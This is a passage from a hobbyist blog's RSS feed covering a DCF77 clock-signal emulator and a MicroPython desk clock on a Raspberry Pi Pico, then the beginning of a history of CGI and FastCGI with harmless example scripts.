      b &gt;&gt;= <span class="hljs-number">1</span>;
    }
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"\n"</span>);

    sleep_ms(<span class="hljs-number">1000</span>);
  }
}
</code></pre>
<p>I wanted to avoid implementing the data conversion and bit magic, so I just used fixed values for the time. Anyway, the clock starts synchronizing after powering on, and after a few minutes, it sets the &quot;accurate&quot; time it got from the &quot;radio signal&quot;. The LED on the Pico flashes to the beat of the signal.</p>
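<p>For reference, here is a minimal sketch of the skipped conversion: building a frame from date and time fields, with bit <code>i</code> sent in second <code>i</code> as in the loop above. It is not the code used in this project; <code>dcf77_encode</code> is a hypothetical name, <code>dow</code> uses the DCF77 convention (1 = Monday, 7 = Sunday), and it leaves the weather/warning bits (1-14), the call bit (15) and both announcement bits (16, 19) at <code>0</code>, so it will not reproduce the recorded weather bits in the fixed values.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Convert 0-99 to packed BCD (tens digit in the upper nibble). */
static uint64_t to_bcd(int value) {
  return (uint64_t)(((value / 10) << 4) | (value % 10));
}

/* 1 if v has an odd number of 1 bits, so data plus parity bit is even. */
static uint64_t even_parity(uint64_t v) {
  uint64_t p = 0;
  while (v) {
    p ^= v & 1;
    v >>= 1;
  }
  return p;
}

/* Hypothetical encoder: returns the 59-bit frame announcing the given minute. */
uint64_t dcf77_encode(int year, int month, int day, int dow,
                      int hour, int minute, bool summer_time) {
  uint64_t frame = 0;
  frame |= (summer_time ? 1ULL : 0ULL) << 17;  /* Z1: CEST in effect */
  frame |= (summer_time ? 0ULL : 1ULL) << 18;  /* Z2: CET in effect */
  frame |= 1ULL << 20;                         /* start of time: always 1 */

  uint64_t min_bits = to_bcd(minute);
  uint64_t hour_bits = to_bcd(hour);
  uint64_t date_bits = to_bcd(day)               /* bits 36-41 */
                     | (uint64_t)dow << 6         /* bits 42-44 */
                     | to_bcd(month) << 9         /* bits 45-49 */
                     | to_bcd(year % 100) << 14;  /* bits 50-57 */

  frame |= min_bits << 21;
  frame |= even_parity(min_bits) << 28;
  frame |= hour_bits << 29;
  frame |= even_parity(hour_bits) << 35;
  frame |= date_bits << 36;
  frame |= even_parity(date_bits) << 58;
  return frame;
}
```

<p>With these assumptions, <code>dcf77_encode(2024, 1, 21, 7, 17, 0, false)</code> matches the first fixed value above except for bits 1-14, so the table could be generated at startup for consecutive minutes instead of being typed in by hand.</p>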

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2024/sync.mp4" type="video/mp4" />
</video>

<p>I think that's the end of our little journey; we've exhausted almost all the entertainment a cheap radio-controlled clock can offer. For those who want more adventure, it also has a temperature sensor, a piezo buzzer, and an LED backlight.</p>

]]></content:encoded>
        </item>
            <item>
            <title>The time has (not yet) come</title>
            <link>https://deadlime.hu/en/2023/12/28/the-time-has-not-yet-come/</link>
            <pubDate>Thu, 28 Dec 2023 10:29:46 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">b7a3c87afa7d92f355ff2af77e519afa</guid>
            <description>Creating a desk clock with Raspberry Pi Pico</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_clock.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>I've been thinking for a while now that it would be an interesting project to put together a desk clock. It could have, say, a stopwatch, multiple countdown timers that can run in parallel, maybe displaying temperature and humidity as well, that sort of thing. But life's not that easy, so we won't get that far.</p>
<p>First of all, I ordered some parts:</p>
<ul>
<li>a <a href="https://shop.pimoroni.com/products/pico-gfx-pack">backlit LCD</a> with some buttons on it</li>
<li>a <a href="https://www.raspberrypi.com/documentation/microcontrollers/debug-probe.html">Debug Probe</a>, which I just wanted to try out</li>
<li>and a <a href="https://www.raspberrypi.com/documentation/microcontrollers/raspberry-pi-pico.html">Pico W</a> to power it all</li>
</ul>
<p>Then the fun can begin... after we forget about it all for a month or so.</p>
<h3>C/C++ SDK</h3>
<p>The problems started with the Debug Probe. Although it is smaller than a Pico converted into a Picoprobe, it cannot power the Pico being debugged, so overall the extra cables made it a bit of a letdown for me.</p>
<p>Regardless of whether it was a Picoprobe or a Debug Probe, in both cases, I needed <a href="https://shop.pimoroni.com/products/pico-omnibus">extra hardware</a> (which I purchased earlier, fortunately) to connect both the display and the probe to the Pico at the same time.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_debug_probe_gfx_pack.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>I've <a href="https://deadlime.hu/en/2022/10/21/the-smallest-pi/">mentioned before</a> that the CLion solution worked quite well on Linux, but on Windows I couldn't get it to work. This is only a problem because I have Linux installed on my laptop and Windows on my desktop and it's inconvenient for me to do longer development projects on a laptop.</p>
<p>So I tried to get it to work on Windows again, this time using WSL2. Things installed nicely in WSL2 according to the Linux guide and with the help of <a href="https://learn.microsoft.com/en-us/windows/wsl/connect-usb"><code>usbipd-win</code></a> I was able to share the Pico with it. CLion has WSL2 support too, so it was able to build the project successfully, but it can't run OpenOCD in WSL2, so unfortunately, debugging didn't work. There is <a href="https://youtrack.jetbrains.com/issue/CPP-32484">a ticket</a> about it, so maybe this will be fixed one day.</p>
<p>This is a good way to get a project abandoned for a while (or forever), but in this case, I had another plan. There is an alternative solution: <a href="https://www.raspberrypi.com/documentation/microcontrollers/micropython.html">MicroPython</a>. If we can let go of the lightning-fast C code, we can write it all in Python. It might even be enough for a prototype.</p>
<h3>MicroPython</h3>
<p>Of course, I was not satisfied with the recommended (working) solution, which was the Python IDE called <a href="https://thonny.org/">Thonny</a>. I have no particular problem with it, but if I already have PyCharm, I would like to use it. Fortunately, there is a MicroPython plugin for it, which allowed me to upload the code to the Pico without any problems.</p>
<p>First, we need to copy the MicroPython UF2 file to the Pico. In our case, we need to use the one <a href="https://github.com/pimoroni/pimoroni-pico/releases">supplied by the LCD display manufacturer</a> so that we can access the modules that drive the LCD. The hardware part is also made considerably simpler this way. No need for the Debug Probe, we can connect the Pico directly to the display.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_gfx_pack.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<h3>Code completion</h3>
<p>Life would obviously be too simple if everything just worked. The first problem was code completion. The MicroPython plugin has some support, but it was not enough. There are <a href="https://peps.python.org/pep-0561/#stub-only-packages">stubs</a> like <a href="https://pypi.org/project/micropython-rp2-pico_w-stubs/"><code>micropython-rp2-pico_w-stubs</code></a> which partially solve the problem, but because of the vendor's modified MicroPython, some modules are missing from this stub. Fortunately, the <a href="https://github.com/pimoroni/pimoroni-pico-stubs">vendor has made a stub for their own modules</a>, but I couldn't find an official pip package, so I just downloaded the ZIP and installed it from the filesystem.</p>
<p>I would like to say that everything went smoothly after that... but no. For example, PyCharm didn't recognize the <code>display</code> property of the <code>GfxPack</code> class. I'm not that familiar with stubs, but at a glance, the stub seemed fine:</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">GfxPack</span>:</span>
    <span class="hljs-comment"># ...</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        self.display: PicoGraphics
        self.i2c: PimoroniI2C
</code></pre>
<p>So the problem may be on PyCharm's side. After I modified the stub a bit, it worked well:</p>
<pre><code class="hljs python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">GfxPack</span>:</span>
    <span class="hljs-comment"># ...</span>

    display: PicoGraphics
    i2c: PimoroniI2C

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        ...
</code></pre>
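<p>One possible explanation (an assumption, not verified against PyCharm itself) is that the two stub styles are not equivalent. An annotation on <code>self.display</code> inside a method, without a value, is not recorded anywhere, while a class-level annotation becomes part of the class's annotations. A quick CPython check, with <code>int</code> standing in for <code>PicoGraphics</code> and <code>PimoroniI2C</code>:</p>
<pre><code class="hljs python">from typing import get_type_hints


class GfxPackInInit:
    # Original stub style: attributes annotated inside __init__ without a value
    def __init__(self):
        self.display: int
        self.i2c: int


class GfxPackClassLevel:
    # Modified stub style: attributes declared in the class body
    display: int
    i2c: int

    def __init__(self):
        ...


# Runtime introspection only sees the class-level declarations
print(get_type_hints(GfxPackInInit))
print(sorted(get_type_hints(GfxPackClassLevel)))

# Neither style creates the attribute itself, both are pure declarations
print(hasattr(GfxPackInInit(), 'display'), hasattr(GfxPackClassLevel(), 'display'))
</code></pre>
<p>Static analyzers don't have to rely on runtime introspection, so this proves nothing about PyCharm, but the class-level form is the usual way to declare instance attributes in stub files anyway.</p>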
<p>Surely everything works now, right? Wrong. Let's just say it's usable. There are still some oddities around imports: it doesn't offer to import certain modules, but if I import them manually, it recognizes them.</p>
<p>In any case, we can write code and run it on the Pico, but the MicroPython REPL within PyCharm doesn't work for some reason. We don't see any <code>print</code> output sent to serial, or even the stack trace of an exception, which doesn't make life any easier. I can connect to it using PuTTY, and that works, but as long as PuTTY is connected, PyCharm can't send code to the Pico, so it's a bit inconvenient. I'm sure it would work on Linux.</p>
<h3>The clock</h3>
<p>We should end up with something clock-like, so we have some sense of achievement. First, I drew the layout on the computer and exported it in <a href="https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format">WBMP</a> format (anyone else remember <a href="https://en.wikipedia.org/wiki/Wireless_Application_Protocol">WAP</a>?), which is easy to read and display on the screen, so I could view the layout on the actual hardware.</p>

<p class="image image-pixelated image-center">
    <img src="https://deadlime.hu/uploads/2023/pico_clock_ui.png" width="512" height="256" alt="" title="" loading="lazy" />
</p>

<pre><code class="hljs python"><span class="hljs-keyword">from</span> gfx_pack <span class="hljs-keyword">import</span> GfxPack


gp = GfxPack()
gp.set_backlight(<span class="hljs-number">0</span>, <span class="hljs-number">180</span>, <span class="hljs-number">60</span>, <span class="hljs-number">140</span>)

<span class="hljs-keyword">with</span> open(<span class="hljs-string">'pico-clock.wbm'</span>, <span class="hljs-string">'rb'</span>) <span class="hljs-keyword">as</span> f:
    buffer = bytearray([b ^ <span class="hljs-number">0xFF</span> <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> f.read()[<span class="hljs-number">-1024</span>:]])

gp.display.set_framebuffer(buffer)
gp.display.update()
</code></pre>
<p>The WBMP format has a variable size header at the beginning, but we know the size of the data because the display (and therefore the image) is 128*64 pixels. Each bit stores the state of one pixel, so the data is (128/8)*64, or 1024 bytes. Fortunately, the format of the framebuffer is exactly the same, so we have an easy job. The image originally appeared as a negative, so we had to invert the bits using <code>b ^ 0xFF</code>.</p>
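<p>Taking the last 1024 bytes works because the image size is fixed. If we'd rather not rely on that, the header can be parsed instead. Below is a minimal sketch based on the WBMP type 0 layout: a type field, a fixed header byte, then the width and height as multi-byte integers (7 bits of value per byte, with the high bit meaning more bytes follow), and finally the rows, each padded to whole bytes. The function names are hypothetical, and it only uses basic operations, so it should also run on MicroPython (untested there):</p>
<pre><code class="hljs python">def read_multibyte_int(data, pos):
    # WBMP integers: 7 bits of value per byte, the high bit means "more bytes follow"
    value = 0
    while True:
        byte = data[pos]
        pos += 1
        value = value * 128 + byte % 128
        if byte >= 128:
            continue
        return value, pos


def parse_wbmp(data):
    # Returns (width, height, pixel data) for a type 0 WBMP image
    wbmp_type, pos = read_multibyte_int(data, 0)
    if wbmp_type != 0:
        raise ValueError('only WBMP type 0 is supported')
    pos += 1  # skip the fixed header byte
    width, pos = read_multibyte_int(data, pos)
    height, pos = read_multibyte_int(data, pos)
    size = (width + 7) // 8 * height  # every row is padded to a whole byte
    pixels = data[pos:pos + size]
    if len(pixels) != size:
        raise ValueError('truncated image data')
    return width, height, pixels


# A 128x64 image: the width needs two bytes (0x81 0x00), the height only one (0x40)
header = bytes([0x00, 0x00, 0x81, 0x00, 0x40])
width, height, pixels = parse_wbmp(header + bytes(1024))
print(width, height, len(pixels))
</code></pre>
<p>This also shows why the header size varies: a width of 128 takes two bytes, while a width below 128 would fit in one. On the Pico, the <code>pixels</code> returned by <code>parse_wbmp(f.read())</code> could replace <code>f.read()[-1024:]</code>, still inverted with <code>b ^ 0xFF</code>.</p>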
<p>There were also some minor problems with PyCharm again. It didn't automatically copy the image file to the Pico; I had to right-click on the file and choose <code>Run 'Flash pico-clock.wbm...'</code> (every time the image was updated).</p>
<p>Now that we have the layout, we can forget about it and finally put together a prototype. The first step is to connect to WiFi and get the accurate time using NTP:</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> network
<span class="hljs-keyword">import</span> ntptime
<span class="hljs-keyword">import</span> time


wlan = network.WLAN(network.STA_IF)
wlan.active(<span class="hljs-literal">True</span>)
wlan.connect(<span class="hljs-string">'SSID'</span>, <span class="hljs-string">'secret'</span>)

<span class="hljs-keyword">while</span> <span class="hljs-keyword">not</span> wlan.isconnected():
    print(<span class="hljs-string">'WLAN is not ready\n'</span>)
    time.sleep(<span class="hljs-number">1</span>)

ntptime.host = <span class="hljs-string">'hu.pool.ntp.org'</span>
ntptime.settime()

wlan.disconnect()
</code></pre>
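<p><code>ntptime.settime()</code> hides the protocol, but the request itself is tiny. Here's a rough CPython sketch of a simple SNTP query; it is not the source of the <code>ntptime</code> module, and the helper names are made up for this example. The client sends a 48-byte packet whose first byte, <code>0x1B</code>, encodes version 3 and client mode, and the reply carries the server's transmit timestamp in bytes 40 to 47 as seconds since 1900 plus a 32-bit fraction:</p>
<pre><code class="hljs python">import socket
import struct

NTP_TO_UNIX = 2208988800  # seconds between 1900-01-01 and 1970-01-01


def build_request():
    # 48-byte packet; 0x1B = leap indicator 0, version 3, mode 3 (client)
    return b'\x1b' + bytes(47)


def parse_response(data):
    # Transmit timestamp: 32-bit seconds and 32-bit fraction at bytes 40-47
    seconds, fraction = struct.unpack('!II', data[40:48])
    return seconds - NTP_TO_UNIX + fraction / 2**32


def query(host='hu.pool.ntp.org', timeout=1.0):
    # One UDP round trip to port 123, without any sanity checks on the answer
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_request(), (host, 123))
        data, _ = sock.recvfrom(48)
    return parse_response(data)
</code></pre>
<p>Calling <code>query()</code> needs network access; <code>time.gmtime(query())</code> turns the result into a UTC time tuple.</p>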
<p>And then we display it nicely:</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> time
<span class="hljs-keyword">from</span> gfx_pack <span class="hljs-keyword">import</span> GfxPack


gp = GfxPack()
gp.set_backlight(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">40</span>)

<span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
    t = time.localtime()

    gp.display.set_pen(<span class="hljs-number">0</span>)
    gp.display.clear()
    gp.display.set_pen(<span class="hljs-number">15</span>)

    gp.display.set_font(<span class="hljs-string">'bitmap6'</span>)
    gp.display.text(<span class="hljs-string">f'<span class="hljs-subst">{t[<span class="hljs-number">0</span>]}</span>. <span class="hljs-subst">{t[<span class="hljs-number">1</span>]:<span class="hljs-number">02</span>}</span>. <span class="hljs-subst">{t[<span class="hljs-number">2</span>]:<span class="hljs-number">02</span>}</span>.'</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>)

    gp.display.set_font(<span class="hljs-string">'bitmap14_outline'</span>)
    gp.display.text(<span class="hljs-string">f'<span class="hljs-subst">{t[<span class="hljs-number">3</span>]:<span class="hljs-number">02</span>}</span>:<span class="hljs-subst">{t[<span class="hljs-number">4</span>]:<span class="hljs-number">02</span>}</span>'</span>, <span class="hljs-number">0</span>, <span class="hljs-number">20</span>)
    <span class="hljs-keyword">if</span> t[<span class="hljs-number">5</span>] % <span class="hljs-number">2</span>:
        gp.display.set_pen(<span class="hljs-number">15</span>)
    <span class="hljs-keyword">else</span>:
        gp.display.set_pen(<span class="hljs-number">0</span>)
    gp.display.text(<span class="hljs-string">':'</span>, <span class="hljs-number">32</span>, <span class="hljs-number">20</span>)

    gp.display.update()

    time.sleep_ms(<span class="hljs-number">30</span>)
</code></pre>
<p>Maybe even add some backlight to it to make it look a bit more like a Casio watch from the nineties.</p>
<pre><code class="hljs python">light_timeout = <span class="hljs-literal">None</span>
<span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> light_timeout <span class="hljs-keyword">and</span> gp.switch_pressed(SWITCH_E):
        light_timeout = time.time_ns() + <span class="hljs-number">2000000000</span>
        gp.set_backlight(<span class="hljs-number">0</span>, <span class="hljs-number">180</span>, <span class="hljs-number">60</span>, <span class="hljs-number">140</span>)

    <span class="hljs-keyword">if</span> light_timeout <span class="hljs-keyword">and</span> light_timeout &lt; time.time_ns():
        light_timeout = <span class="hljs-literal">None</span>
        gp.set_backlight(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">40</span>)

    <span class="hljs-comment"># ...</span>
</code></pre>
<p>The final result (after adding some extra status information):</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2023/pico_clock.mp4" type="video/mp4" />
</video>

<p>Even for a prototype, it's still missing a lot of things, but unfortunately, this is as far as the project got in the first round. Also, MicroPython can't handle time zones, so we have to move to a country with a UTC timezone to use it.</p>
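<p>If moving isn't an option, a fixed rule could stand in for a real time zone database. A minimal sketch, assuming Hungary keeps following the EU daylight saving rules (UTC+1 in winter, UTC+2 from 01:00 UTC on the last Sunday of March until 01:00 UTC on the last Sunday of October). The function names are hypothetical, and the code sticks to integer arithmetic, so it should also run on MicroPython:</p>
<pre><code class="hljs python">def weekday(year, month, day):
    # Sakamoto's method: 0 = Sunday, 1 = Monday, ..., 6 = Saturday
    offsets = (0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4)
    if month in (1, 2):
        year -= 1
    return (year + year // 4 - year // 100 + year // 400 + offsets[month - 1] + day) % 7


def last_sunday(year, month):
    # Only used for March and October, which both have 31 days
    return 31 - weekday(year, month, 31)


def cet_offset_hours(year, month, day, hour):
    # Takes a UTC date and hour, returns 1 (CET) or 2 (CEST)
    if month in (4, 5, 6, 7, 8, 9):
        return 2
    if month == 3:
        # Summer time starts at 01:00 UTC on the last Sunday of March
        return 2 if (day, hour) >= (last_sunday(year, 3), 1) else 1
    if month == 10:
        # ...and ends at 01:00 UTC on the last Sunday of October
        return 1 if (day, hour) >= (last_sunday(year, 10), 1) else 2
    return 1
</code></pre>
<p>On the Pico, where <code>time.localtime()</code> effectively returns UTC after <code>ntptime.settime()</code>, something like <code>t = time.localtime(time.time() + 3600 * cet_offset_hours(*time.localtime()[:4]))</code> could replace the plain <code>time.localtime()</code> call in the clock loop.</p>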
<p>What will happen to the clock after this? Will it go to the bottom of the drawer or will we see it in the future? Only time will tell.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Technologies left behind</title>
            <link>https://deadlime.hu/en/2023/11/24/technologies-left-behind/</link>
            <pubDate>Fri, 24 Nov 2023 17:24:08 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[HTTP]]></category>
                    <category><![CDATA[CGI]]></category>
                    <category><![CDATA[FastCGI]]></category>
                    <category><![CDATA[SCGI]]></category>
                    
            <guid isPermaLink="false">1979071ffe5bcdf0a72bfc4105e76a86</guid>
            <description>A brief history of the dynamic web from CGI to applications with built-in HTTP servers</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/deserted-computer.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>The year is 1993. You need to develop a dynamic website, let's say a guestbook, which was quite popular at the time. How would you go about it? If your answer is to google how to do it, I have sad news for you: Google won't be a thing for another 5 years. AltaVista is still two years away. Stack Overflow? Another 15 years... It sure wasn't easy to be a developer in the old days.</p>
<p>Sometimes it's good to look back at those old days to see how we can avoid repeating their mistakes or reinventing the wheel. That was one of my motivations to go on an adventure and learn how web development evolved into what we know today.</p>
<h3>Common Gateway Interface</h3>
<p>Its development started in the early 1990s, and it was eventually formalized (in 2004) as <a href="https://datatracker.ietf.org/doc/html/rfc3875">RFC 3875</a>. As the name suggests, it is an interface between a web server and an application. In practice, this means that if you have an arbitrary executable file, the web server can run it (after proper configuration) and return its output as the response.</p>
<p>The request data is received in environment variables and via standard input, and the response must be written to standard output, with a few small syntactic restrictions (the output must start with header lines, such as <code>Content-Type</code>, followed by an empty line).</p>
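<p>To make the mechanism more concrete, here's a rough Python sketch of what a web server does when it runs a CGI program: it puts the request data into environment variables, pipes the body to standard input, and splits the output into headers and body at the first empty line. The "script" is an inline Python program only to keep the example self-contained; a real server sets many more variables and also deals with errors and timeouts:</p>
<pre><code class="hljs python">import os
import subprocess
import sys

# A tiny CGI "script", written in Python only to keep the example self-contained
SCRIPT = r'''
import os, sys
length = int(os.environ.get("CONTENT_LENGTH") or 0)
body = sys.stdin.read(length)
print("Content-Type: text/plain")
print()
print("method=" + os.environ["REQUEST_METHOD"])
print("query=" + os.environ["QUERY_STRING"])
print("body=" + body)
'''


def run_cgi(method, query, body):
    # Request data goes into environment variables...
    env = dict(os.environ)
    env.update({
        'GATEWAY_INTERFACE': 'CGI/1.1',
        'REQUEST_METHOD': method,
        'QUERY_STRING': query,
        'CONTENT_LENGTH': str(len(body)),
        'CONTENT_TYPE': 'application/x-www-form-urlencoded',
    })
    # ...and the body goes to the standard input of a brand new process
    result = subprocess.run(
        [sys.executable, '-c', SCRIPT],
        input=body, env=env, capture_output=True, text=True, check=True,
    )
    # Output: header lines, an empty line, then the response body
    head, _, payload = result.stdout.partition('\n\n')
    headers = dict(line.split(': ', 1) for line in head.splitlines())
    return headers, payload


headers, payload = run_cgi('POST', 'foo=bar', 'foo=bar')
print(headers)
print(payload)
</code></pre>
<p>The <code>subprocess.run</code> call is also where the main cost of CGI shows: every request pays for starting a new interpreter.</p>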
<p>The advantage is that it's simple: just copy a file to a directory, make it executable, and you're done. The disadvantage is that each request means starting a new process, which can be slow and doesn't scale very well.</p>
<p>Such setups were easy to spot, because these applications usually lived in the <code>/cgi-bin/</code> directory, which automated scanning tools still probe today to see if they can find anything interesting there.</p>
<p>And when I said arbitrary executable, I meant it. Even a shell script can be the basis of a dynamic web page (if you are brave enough to parse query strings and <a href="https://stackoverflow.com/a/23517227">multipart requests</a> in a shell script):</p>
<pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh
</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Content-Type: text/plain"</span>
<span class="hljs-built_in">echo</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello World!"</span>

<span class="hljs-built_in">echo</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Environment:"</span>
env

<span class="hljs-built_in">echo</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Input:"</span>
cat -
<span class="hljs-built_in">echo</span>
</code></pre>
<p>If you call this endpoint, the following data will be returned:</p>
<pre><code class="hljs shell"><span class="hljs-meta">$</span><span class="bash"> curl -d<span class="hljs-string">'foo=bar'</span> <span class="hljs-string">'http://127.0.0.1:8081/cgi-bin/test.sh?foo=bar'</span></span>
Hello World!

Environment:
CONTENT_TYPE=application/x-www-form-urlencoded
GATEWAY_INTERFACE=CGI/1.1
REMOTE_ADDR=192.168.16.1
SHLVL=1
QUERY_STRING=foo=bar
HTTP_USER_AGENT=curl/7.88.1
DOCUMENT_ROOT=/usr/local/apache2/htdocs
REMOTE_PORT=51282
HTTP_ACCEPT=*/*
SERVER_SIGNATURE=
CONTENT_LENGTH=7
CONTEXT_DOCUMENT_ROOT=/usr/local/apache2/cgi-bin/
SCRIPT_FILENAME=/usr/local/apache2/cgi-bin/test.sh
HTTP_HOST=127.0.0.1:8081
REQUEST_URI=/cgi-bin/test.sh?foo=bar
SERVER_SOFTWARE=Apache/2.4.58 (Unix)
REQUEST_SCHEME=http
PATH=/usr/local/apache2/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=POST
SERVER_ADDR=192.168.16.2
SERVER_ADMIN=you@example.com
CONTEXT_PREFIX=/cgi-bin/
PWD=/usr/local/apache2/cgi-bin
SERVER_PORT=8081
SCRIPT_NAME=/cgi-bin/test.sh
SERVER_NAME=127.0.0.1

Input:
foo=bar
</code></pre>
<p>The names of the environment variables may look familiar: they have been adopted in many places, probably to ease the transition from CGI.</p>
<p>The possibilities are endless. I've thrown in a few extra examples in the <a href="https://github.com/deadlime/cgi-playground/tree/main/cgi-bin">related GitHub repository</a> (a compiled binary from C code? Why not!), but Perl was probably the real star of the <code>cgi-bin</code> directory back then:</p>
<pre><code class="hljs perl"><span class="hljs-comment">#!/usr/bin/perl</span>

<span class="hljs-keyword">print</span> <span class="hljs-string">"Content-type: text/plain\n\nHello, World.\n"</span>;

<span class="hljs-keyword">print</span> <span class="hljs-string">"\nEnvironment:\n"</span>;
<span class="hljs-keyword">foreach</span> <span class="hljs-keyword">my</span> $key (<span class="hljs-keyword">keys</span> %ENV) {
    <span class="hljs-keyword">print</span> <span class="hljs-string">"$key=$ENV{$key}\n"</span>;
}

<span class="hljs-keyword">print</span> <span class="hljs-string">"\nInput:\n"</span>;
<span class="hljs-keyword">while</span> (&lt;&gt;) {
    <span class="hljs-keyword">print</span>;
}
<span class="hljs-keyword">print</span> <span class="hljs-string">"\n"</span>;
</code></pre>
<p>Then in 1995, PHP arrived. At first, it also ran as a CGI script.</p>
<pre><code class="hljs php"><span class="hljs-comment">#!/usr/bin/php82</span>
<span class="hljs-meta">&lt;?php</span>

<span class="hljs-keyword">print</span>(<span class="hljs-string">"Content-Type: text/plain\n\nHello World!\n"</span>);

<span class="hljs-keyword">print</span>(<span class="hljs-string">"\nEnvironment:\n"</span>);
var_dump($_SERVER);

<span class="hljs-keyword">print</span>(<span class="hljs-string">"\nInput:\n"</span>);
var_dump(file_get_contents(<span class="hljs-string">'php://stdin'</span>));
</code></pre>
<p>Here I was a bit surprised to find the request data in the <code>$_SERVER</code> array and not in the <code>$_ENV</code> array. Maybe it's because of the newer PHP, or maybe CGI scripts should be invoked differently; I don't know. But it doesn't really matter, because we could soon leave CGI behind.</p>
<h3>Alternative solutions</h3>
<h4>FastCGI</h4>
<p>Also around 1995, FastCGI was released, which aimed to address the performance problems of CGI. Based on the <a href="https://metacpan.org/release/LEEJO/CGI-Fast-2.17/source/lib/CGI/Fast.pm#L43">CGI::Fast</a> package in Perl, it can work in several ways. The web server can start one or more instances of the FastCGI application itself, handing it a listening socket in place of standard input, and then send FCGI requests through that socket and wait for the FCGI responses. Alternatively, the web server and a separately started FCGI process can communicate via a Unix socket or a regular network socket. Either way, the web server then converts the FCGI response to an HTTP response and you are done.</p>
<p>According to the protocol description, the web server can send multiple requests to a process at the same time, which the FCGI process can process in parallel if it supports it.</p>
<p>The advantage of this system is that it is easier to implement an FCGI server than an HTTP server (the original HTTP/1.0 <a href="https://datatracker.ietf.org/doc/html/rfc1945">RFC 1945</a> is 60 pages long, and the HTTP/1.1 <a href="https://datatracker.ietf.org/doc/html/rfc2068">RFC 2068</a> is 162 pages long). The disadvantage may be that there is a fairly trusting relationship between the web server and the FCGI server, so if someone else manages to talk to the FCGI server directly, it may not end well (for example, the FCGI server code may not handle malformed requests as well as the HTTP server, or it may be possible to bypass the authentication enforced by the web server this way).</p>
<p>As I mentioned, the <a href="https://www.mit.edu/~yandros/doc/specs/fcgi-spec.html">FastCGI protocol</a> is simpler than HTTP, so applications can more easily implement it. Just for fun, I quickly threw together <a href="https://github.com/deadlime/cgi-playground/blob/main/bin/fcgi_server.py">a simple Python FCGI server</a> that can return a similar response as our previous CGI scripts to any request.</p>
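<p>To give a feel for the protocol, here's a minimal Python sketch (not the code from the repository above) that builds the records a web server would send for a single request, based on the FastCGI specification. Every record has an 8-byte header (version, type, request ID, content length, padding length, reserved), the parameters are sent as length-prefixed name-value pairs, and an empty record closes each stream. Content longer than 65535 bytes would have to be split into several records, which this sketch doesn't do:</p>
<pre><code class="hljs python">import struct

FCGI_VERSION_1 = 1
FCGI_BEGIN_REQUEST = 1
FCGI_PARAMS = 4
FCGI_STDIN = 5
FCGI_RESPONDER = 1


def record(rec_type, request_id, content=b''):
    # Header: version, type, request ID, content length, padding length, reserved
    padding = -len(content) % 8  # the spec recommends aligning records to 8 bytes
    header = struct.pack('!BBHHBx', FCGI_VERSION_1, rec_type, request_id, len(content), padding)
    return header + content + bytes(padding)


def encode_length(n):
    # Lengths up to 127 fit in one byte, longer ones use four bytes with the top bit set
    if n > 127:
        return struct.pack('!I', n | 0x80000000)
    return struct.pack('!B', n)


def name_value_pairs(params):
    out = b''
    for name, value in params.items():
        name, value = name.encode(), value.encode()
        out += encode_length(len(name)) + encode_length(len(value)) + name + value
    return out


def build_request(request_id, params, body):
    # Role RESPONDER, flags 0: the application closes the connection after responding
    begin = struct.pack('!HB5x', FCGI_RESPONDER, 0)
    return (
        record(FCGI_BEGIN_REQUEST, request_id, begin)
        + record(FCGI_PARAMS, request_id, name_value_pairs(params))
        + record(FCGI_PARAMS, request_id)  # empty record: end of parameters
        + record(FCGI_STDIN, request_id, body)
        + record(FCGI_STDIN, request_id)  # empty record: end of request body
    )


request = build_request(1, {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'foo=bar'}, b'foo=bar')
print(len(request), request[:8].hex())
</code></pre>
<p>The response travels the same way in the other direction, as <code>FCGI_STDOUT</code> records followed by an <code>FCGI_END_REQUEST</code> record.</p>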
<h4>mod_php</h4>
